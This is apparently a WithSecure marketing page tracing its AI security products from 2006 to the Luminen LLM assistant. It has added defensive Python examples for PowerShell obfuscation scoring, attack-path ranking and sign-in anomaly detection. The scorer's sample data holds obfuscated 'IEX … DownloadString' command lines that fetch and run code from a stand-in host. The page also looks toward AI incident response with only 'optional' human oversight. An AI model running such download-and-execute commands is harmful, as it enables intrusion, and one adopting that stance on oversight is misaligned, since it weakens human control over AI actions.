Revolutionizing AI in cyber security

WithSecure’s industry-leading innovation across two decades 


WithSecure has been at the forefront of artificial intelligence innovation for nearly two decades, leveraging transformative technology to provide advanced, effective, and safe cyber security solutions.

The AI journey began in 2006 with the Gemini file analysis engine: a naïve Bayesian classifier that identified unique characteristics of malware by analysing extensive datasets of malicious and clean files. Gemini set the stage for modern threat detection systems.

Building on this foundation, WithSecure began building the Sample Management Automation (SMA) system, employing heuristic reasoning through the CLIPS expert system engine. SMA was groundbreaking, automating malware identification via sandboxed environments and heuristic analysis. By keeping these advancements under wraps, WithSecure maintained a competitive edge until similar ‘next-gen’ solutions emerged years later. 

AI-powered Extended Detection and Response

WithSecure Elements Extended Detection and Response (XDR) is a unified solution that has its roots in the success of the heuristic reasoning model invented with SMA. It was first developed as a rapid detection service in 2016 and has grown over the years, becoming a unified solution that can protect entire IT estates. It minimizes the impact of attacks by using automated and advanced preventative controls that keep incident volumes and lower-level attacks at bay.

AI-powered tooling enables fast detection, investigation, and response to threats across endpoints, identities, emails and other cloud-based collaboration services. XDR uses a large collection of point AI engines for various tasks, including: 

  • Baseliner engine swarm, which identifies the clean baseline behaviour across an organization

  • Noise cancelling engines, on-device engines that absorb host-unique noise, preventing false alarms on hosts such as build servers

  • BlackFin anomaly detection models, which identify unusual patterns in the collected data

  • PowerShell obfuscation detection, which flags PowerShell command lines and scripts that appear to be obfuscated.
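As an added illustration (not WithSecure's engine or code), the following Python scores a command line on a handful of indicators of the kind a PowerShell obfuscation detector looks for: the -EncodedCommand flag (whose payload is base64 of UTF-16LE text and is decoded for inspection), backtick insertion inside words, string-fragment concatenation, [char] casting, the -f format operator, a hidden window, and a few cmdlets that typically follow de-obfuscation. The regexes, weights and threshold are assumptions chosen for the demo, and the command lines are constructed, not real telemetry.

```python
"""Heuristic scoring of PowerShell command lines for obfuscation.

Added illustration, not WithSecure's engine.  Indicators, weights and the
threshold are assumptions chosen for the demo; command lines are constructed.
"""
import base64
import re

# -e / -ec / -enc / -encodedcommand (PowerShell accepts any unambiguous prefix)
# followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e[ncodemand]*\s+([A-Za-z0-9+/=]{16,})")
# Backtick inserted inside a word ("i`e`x"); the escapes `n `t `r `0 are skipped.
BACKTICK_SPLIT = re.compile(r"`(?![ntr0])[A-Za-z]")
# 'str'+'ing' fragments that are only joined at runtime.
STRING_CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
CHAR_CAST = re.compile(r"(?i)\[char\]")
# Format-operator reordering, e.g. ('{1}{0}' -f 'b','a').
FORMAT_OPERATOR = re.compile(r"""(?i)\{\d+\}.*-f\s+['"]""")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
SUSPICIOUS_CMDLETS = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|frombase64string)\b")

# Assumed weights: techniques that exist only to hide intent weigh 2,
# context that is merely common in malicious use weighs 1.
WEIGHTS = {
    "encoded_command": 2,
    "backtick_splitting": 2,
    "string_concatenation": 2,
    "char_casting": 2,
    "format_operator": 1,
    "hidden_window": 1,
    "suspicious_cmdlets": 1,
}
THRESHOLD = 3  # assumed cut-off; tune against the estate's own clean command lines


def decode_encoded_command(blob: str):
    """-EncodedCommand payloads are base64 of UTF-16LE text; None if undecodable."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(command_line: str) -> dict:
    """Return score, verdict, the indicators that fired and any decoded payload."""
    indicators = []
    decoded = None
    m = ENCODED_FLAG.search(command_line)
    if m:
        indicators.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    # Inspect the visible command and, if present, the decoded payload together.
    text = command_line + ("\n" + decoded if decoded else "")
    if len(BACKTICK_SPLIT.findall(text)) >= 2:
        indicators.append("backtick_splitting")
    if STRING_CONCAT.search(text):
        indicators.append("string_concatenation")
    if CHAR_CAST.search(text):
        indicators.append("char_casting")
    if FORMAT_OPERATOR.search(text):
        indicators.append("format_operator")
    if HIDDEN_WINDOW.search(text):
        indicators.append("hidden_window")
    # Strip backticks first so "i`e`x" is matched as "iex".
    if SUSPICIOUS_CMDLETS.search(text.replace("`", "")):
        indicators.append("suspicious_cmdlets")
    score = sum(WEIGHTS[i] for i in indicators)
    return {"score": score, "obfuscated": score >= THRESHOLD,
            "indicators": indicators, "decoded": decoded}


# Constructed command lines (not real telemetry); the last two are benign.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMAND_LINES = {
    "encoded": "powershell.exe -nop -w hidden -enc "
               + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode(),
    "backticks": '''powershell -c "i`e`x (&('Ne'+'w-Ob'+'ject') 'Net.WebClient').DownloadString('http://example.invalid/b')"''',
    "format": '''powershell -w hidden -c "$m=('{1}{0}' -f 'String','Download'); $o=New-Object Net.WebClient; $o.$m('http://example.invalid/c')|iex"''',
    "benign_script": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "benign_listing": r"Get-ChildItem -Path 'C:\Program Files' -Recurse | Measure-Object",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMAND_LINES.items():
        result = analyse(cmd)
        print(f"{name:15} score={result['score']} obfuscated={result['obfuscated']} {result['indicators']}")
```

What a production engine adds on top of a scorer like this is the baseline: a fixed threshold only holds up once it has been checked against the clean command lines a given estate actually produces (scheduled tasks and deployment tooling often use -EncodedCommand and hidden windows legitimately), which is exactly the job the baseliner and noise cancelling engines listed above are described as doing.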

AI-assisted Identity Threat Detection and Response

WithSecure’s Elements Identity Security solution is built on the XDR technology stack and therefore uses the same heuristic reasoning engine. However, because it is newer than XDR its AI lineup is still modest and developing. The solution is currently being expanded to cover cloud resources.

Modern Endpoint Protection

WithSecure uses AI for Endpoint Protection in two main ways: in DeepGuard, the on-device AI, and in W/Mind, the modern reimplementation of the SMA approach.

DeepGuard employs heuristic reasoning to detect and block obviously malicious activities. This system was specifically curated to have extremely low false alarm rates, making it reliable as a first line of defence.

W/Mind is a heuristic reasoning system which analyses suspicious files and URLs, calling upon AI engines including: 

  • DiAPK (Android APK file analysis)

  • MalPE (malicious Windows binary analysis) 

  • MalDoc (malicious document file analysis)

  • and more. 

Luminen: Situational Awareness and Analysis

Luminen is a generative AI capability based on an LLM and natively embedded into WithSecure Elements Cloud. It offers two key functionalities to accelerate threat investigations and enhance the workflow of IT and cybersecurity teams: security event activity summary and investigation assistant.

By lowering the bar for cybersecurity expertise, Luminen enables even non-security experts to understand threats, ultimately leading to better protection for organizations. 

Security Event Activity Summary

Luminen provides concise summaries of recent security events, translated into the user’s local language. The tool automatically generates weekly summary reports, highlighting the most significant security events and suggesting actions. These reports are designed to be actionable, with built-in event drill-downs for verifying source data. This feature is especially beneficial for less experienced team members, as it simplifies complex information. 

Investigation Assistant

Luminen also offers actionable recommendations and guidance for addressing detected threats. This feature delves deeper into Broad Context Detections (BCDs), providing natural-language explanations and empowering teams to focus on critical tasks.

Exposure Management: Proactive Defence

WithSecure’s Exposure Management (XM) solution is also built on the heuristic reasoning engine, but with a twist. Instead of using the reasoning capabilities to detect attacks from events happening in the environment, the XM AI uses reasoning to identify the vulnerabilities, misconfigurations, and other resources an attacker could exploit. This knowledge is then used to build attack simulations and identify the worst-case threats an environment could face from a real attacker.

The result? Organizations gain a clear understanding of their most critical risks and can prioritize mitigation accordingly. 
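An added example of the reasoning step described above (not WithSecure's XM engine): findings are modelled as edges an attacker can traverse between assets, each with an assumed likelihood of success; the code enumerates attacker paths from entry points to crown-jewel assets, takes the most likely path to each as its worst case, and ranks findings by how much fixing each one would reduce that worst-case risk. Asset names, findings and likelihoods are constructed for the demo.

```python
"""Attack-path reasoning over findings: worst-case paths and mitigation ranking.

Added example, not WithSecure's Exposure Management engine.  Assets, findings
and the per-finding success likelihoods are constructed for the demo.
"""
from collections import defaultdict

# Each finding is an edge an attacker can traverse, with an assumed likelihood
# ("p") that a real attacker succeeds in using it.
FINDINGS = [
    {"id": "F1", "from": "internet", "to": "web01", "p": 0.9,
     "desc": "unauthenticated remote code execution in an exposed web app"},
    {"id": "F2", "from": "web01", "to": "db01", "p": 0.8,
     "desc": "database credentials in a world-readable config file"},
    {"id": "F3", "from": "web01", "to": "jump01", "p": 0.6,
     "desc": "local administrator password reused across hosts"},
    {"id": "F4", "from": "jump01", "to": "dc01", "p": 0.7,
     "desc": "unconstrained delegation enabled on the jump host"},
    {"id": "F5", "from": "db01", "to": "dc01", "p": 0.5,
     "desc": "database service account holds domain admin rights"},
    {"id": "F6", "from": "vpn", "to": "jump01", "p": 0.4,
     "desc": "VPN access without MFA"},
]
ENTRY_POINTS = ["internet", "vpn"]   # where an external attacker starts
CROWN_JEWELS = ["dc01", "db01"]      # what the attacker is after


def _adjacency(findings):
    adj = defaultdict(list)
    for f in findings:
        adj[f["from"]].append(f)
    return adj


def enumerate_paths(findings, start, target):
    """All simple attacker paths from start to target, as lists of findings."""
    adj = _adjacency(findings)
    paths = []

    def dfs(node, visited, path):
        if node == target:
            paths.append(list(path))
            return
        for f in adj[node]:
            if f["to"] not in visited:        # no revisiting: keeps paths simple
                visited.add(f["to"])
                path.append(f)
                dfs(f["to"], visited, path)
                path.pop()
                visited.discard(f["to"])

    dfs(start, {start}, [])
    return paths


def path_likelihood(path):
    """Assumes independent steps: the path succeeds only if every step does."""
    p = 1.0
    for f in path:
        p *= f["p"]
    return p


def worst_case(findings, entry_points, crown_jewels):
    """For each crown jewel, the most likely attacker path and its likelihood."""
    result = {}
    for target in crown_jewels:
        best = (0.0, [])
        for entry in entry_points:
            for path in enumerate_paths(findings, entry, target):
                lik = path_likelihood(path)
                if lik > best[0]:
                    best = (lik, [f["id"] for f in path])
        result[target] = best
    return result


def total_risk(findings, entry_points, crown_jewels):
    return sum(lik for lik, _ in worst_case(findings, entry_points, crown_jewels).values())


def rank_mitigations(findings, entry_points, crown_jewels):
    """Rank findings by how much fixing each one alone lowers worst-case risk."""
    base = total_risk(findings, entry_points, crown_jewels)
    ranked = []
    for f in findings:
        remaining = [g for g in findings if g["id"] != f["id"]]
        ranked.append((f["id"], base - total_risk(remaining, entry_points, crown_jewels)))
    ranked.sort(key=lambda item: item[1], reverse=True)
    return ranked


if __name__ == "__main__":
    for target, (lik, path) in worst_case(FINDINGS, ENTRY_POINTS, CROWN_JEWELS).items():
        print(f"{target}: worst case {lik:.3f} via {' -> '.join(path)}")
    for fid, gain in rank_mitigations(FINDINGS, ENTRY_POINTS, CROWN_JEWELS):
        print(f"fix {fid}: reduces worst-case risk by {gain:.3f}")
```

On this constructed graph the exposed web application (F1) comes out on top, not because it is the most severe finding in isolation but because every high-likelihood path to both crown jewels runs through it; the domain-admin service account (F5), severe on paper, changes the worst case not at all because a more likely path to the domain controller exists anyway. That difference between severity and reachable impact is the prioritisation the text describes.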

Future-Forward AI: Beyond Generative Models

Generative AI (GenAI) represents just one facet of WithSecure’s approach. While many companies rely on large language models (LLMs) indiscriminately, WithSecure advocates for a smarter, more energy-efficient mix of algorithms. Here’s how WithSecure envisions the future:

  • Specialized Algorithms: Smaller, task-focused models collaborating seamlessly. 

  • AI with Agency: Autonomous systems capable of detecting and responding to incidents, and acting on recommendations, without human intervention.

  • Human-AI Partnership: Transitioning from human-aided AI to AI-aided humans, eventually making AI-driven responses safe and reliable enough for optional human oversight. 

Centring European values

WithSecure is deeply committed to aligning technology with EU regulations like the upcoming AI Code of Practice. WithSecure views compliance not as a hurdle but as a strategic advantage, ensuring transparency, safety, and privacy in its AI systems. 

Identity Security – an Example of the Real-World Results of AI in Cyber Security

AI’s integration into cyber security brings transformative benefits, significantly enhancing the efficiency and effectiveness of security teams. By automating repetitive tasks, processing vast amounts of data, and improving threat detection accuracy, AI enables experts to focus on more strategic challenges and innovation.

For example, WithSecure’s Identity Security service was designed to protect the modern IT environment, particularly Entra ID (Microsoft’s integrated cloud identity and access solution). As more organizations rely on Entra ID, cybercriminals have increasingly exploited the fact that traditional EDR tools fail to provide the necessary visibility into identity-based attacks, leaving enterprises vulnerable.

To address this, the Identity Security service has been specifically developed over two years to monitor and secure Entra ID. AI plays a crucial role in its functionality by analysing user behaviours, normalizing activity patterns, and identifying anomalies indicative of potential threats. By correlating these insights with suspicious sign-ins, AI helps reduce false positives, ensuring that security teams focus only on genuine threats rather than being overwhelmed by routine deviations.
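Added example (not the Identity Security service's own code) of the baselining and correlation step just described, reduced to its essentials: a per-user profile built from successful sign-ins only (countries, network ASNs, hours and applications seen), a scored comparison of each new sign-in against that profile, and the provider's own risk flag treated as one more correlated signal rather than as an alert by itself. Field names, weights and the threshold are assumptions; the ASNs are from the documentation range and all events are constructed, not Entra ID logs.

```python
"""Sign-in anomaly scoring against a per-user behavioural baseline.

Added example, not the Identity Security service's code.  Field names,
weights and the threshold are assumptions; all events are constructed
(ASNs 64496-64499 are reserved for documentation).
"""
from collections import defaultdict
from datetime import datetime

# Assumed weights: geography is the strongest single signal; the provider's
# risk flag is correlated in rather than trusted on its own.
WEIGHTS = {"new_country": 2, "new_asn": 1, "unusual_hour": 1, "new_app": 1,
           "provider_risk": 2}
ALERT_THRESHOLD = 5  # assumed cut-off

# Constructed sign-in history (Entra-like fields, heavily simplified).
BASELINE_EVENTS = [
    {"user": "alice", "time": "2025-02-17T08:02:00", "country": "FI", "asn": 64496, "app": "Outlook", "result": "success"},
    {"user": "alice", "time": "2025-02-18T09:15:00", "country": "FI", "asn": 64496, "app": "Teams", "result": "success"},
    {"user": "alice", "time": "2025-02-19T13:40:00", "country": "FI", "asn": 64496, "app": "Outlook", "result": "success"},
    {"user": "alice", "time": "2025-02-20T16:05:00", "country": "FI", "asn": 64496, "app": "Teams", "result": "success"},
    # A failed attempt from elsewhere must not teach the baseline a new country.
    {"user": "alice", "time": "2025-02-21T02:30:00", "country": "US", "asn": 64499, "app": "Outlook", "result": "failure"},
    {"user": "bob", "time": "2025-02-17T10:10:00", "country": "FI", "asn": 64496, "app": "Teams", "result": "success"},
    {"user": "bob", "time": "2025-02-19T11:20:00", "country": "FI", "asn": 64496, "app": "SharePoint", "result": "success"},
    {"user": "bob", "time": "2025-02-20T15:45:00", "country": "FI", "asn": 64496, "app": "Teams", "result": "success"},
]

# Constructed new sign-ins to triage.
NEW_EVENTS = [
    # Travelling user: new country and network, otherwise normal -> deviation only.
    {"user": "alice", "time": "2025-03-03T09:12:00", "country": "SE", "asn": 64497, "app": "Outlook", "result": "success", "risk_level": "none"},
    # Night-time sign-in from a new country and network to an admin app, flagged risky.
    {"user": "alice", "time": "2025-03-03T03:41:00", "country": "NG", "asn": 64498, "app": "Azure Portal", "result": "success", "risk_level": "high"},
    # Provider flag on a behaviourally normal sign-in -> not enough on its own.
    {"user": "bob", "time": "2025-03-03T10:05:00", "country": "FI", "asn": 64496, "app": "Teams", "result": "success", "risk_level": "medium"},
]

_EMPTY = {"countries": set(), "asns": set(), "hours": set(), "apps": set()}


def build_baselines(events):
    """Profile each user from successful sign-ins only."""
    baselines = defaultdict(lambda: {"countries": set(), "asns": set(), "hours": set(), "apps": set()})
    for e in events:
        if e["result"] != "success":
            continue
        b = baselines[e["user"]]
        b["countries"].add(e["country"])
        b["asns"].add(e["asn"])
        b["hours"].add(datetime.fromisoformat(e["time"]).hour)
        b["apps"].add(e["app"])
    return dict(baselines)


def score_event(event, baselines):
    """Score one sign-in; a never-seen user matches nothing and is flagged for review."""
    b = baselines.get(event["user"], _EMPTY)
    reasons = []
    if event["country"] not in b["countries"]:
        reasons.append("new_country")
    if event["asn"] not in b["asns"]:
        reasons.append("new_asn")
    if datetime.fromisoformat(event["time"]).hour not in b["hours"]:
        reasons.append("unusual_hour")
    if event["app"] not in b["apps"]:
        reasons.append("new_app")
    if event.get("risk_level") in ("medium", "high"):
        reasons.append("provider_risk")
    score = sum(WEIGHTS[r] for r in reasons)
    return {"user": event["user"], "score": score,
            "alert": score >= ALERT_THRESHOLD, "reasons": reasons}


def triage(events, baselines):
    """Return only the sign-ins that cross the alert threshold."""
    return [r for r in (score_event(e, baselines) for e in events) if r["alert"]]


BASELINES = build_baselines(BASELINE_EVENTS)

if __name__ == "__main__":
    for e in NEW_EVENTS:
        print(score_event(e, BASELINES))
```

Two details carry the false-positive argument from the text. Only successful sign-ins shape the baseline, so an attacker's failed attempts from a new country cannot quietly widen what counts as normal for the victim; and a provider risk flag alone scores below the threshold, so a routine deviation is surfaced as context rather than as an incident until behavioural signals corroborate it.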

How AI Models Are Developed

At WithSecure, the development of AI models is an ongoing process of innovation and refinement, driven by the need to combat the ever-evolving landscape of cyber threats. Here's how we approach it:


1. Understanding New Threats 

Every new AI model begins with human analysis. Our experts study emerging threats in detail to gain a deep understanding of their behaviour and characteristics. This foundational knowledge is then used to design automated systems capable of handling the sheer volume of cyber threats.


2. Data-Centric Development 

While the algorithms themselves are often straightforward, the quality and relevance of data are paramount. We focus on:

  • Ensuring the correct data is collected.
  • Filtering out noise and irrelevant information.
  • Extracting meaningful features from the data to make it actionable.
  • Avoiding the “Garbage In, Garbage Out” (GIGO) pitfall: poor data leads to ineffective models.


3. Continuous Improvement 

Our AI engines are not static. Old models are retired as better ones are developed. This iterative process ensures our solutions remain effective against modern threats, providing robust and reliable protection.

By combining expert analysis, high-quality data, and iterative refinement, WithSecure builds AI systems that can adapt to and outpace the ever-changing cyber threat landscape. As AI continues to evolve, so too will WithSecure’s suite of solutions. Future advancements will focus on refining AI models to profile different identity types in the cloud, enabling more precise detection and higher fidelity alerts. Additionally, industry-leading recommendations will be integrated, leveraging insights from past incidents and the company’s comprehensive security portfolio. With these continuous improvements, AI-driven cybersecurity will remain at the forefront of defending against ever-evolving digital threats. 

Ready to learn more?

Learn how WithSecure's cutting-edge AI solutions can transform your cybersecurity strategy. Visit our offering page to explore our full range of services and see how we can help you stay one step ahead of emerging threats.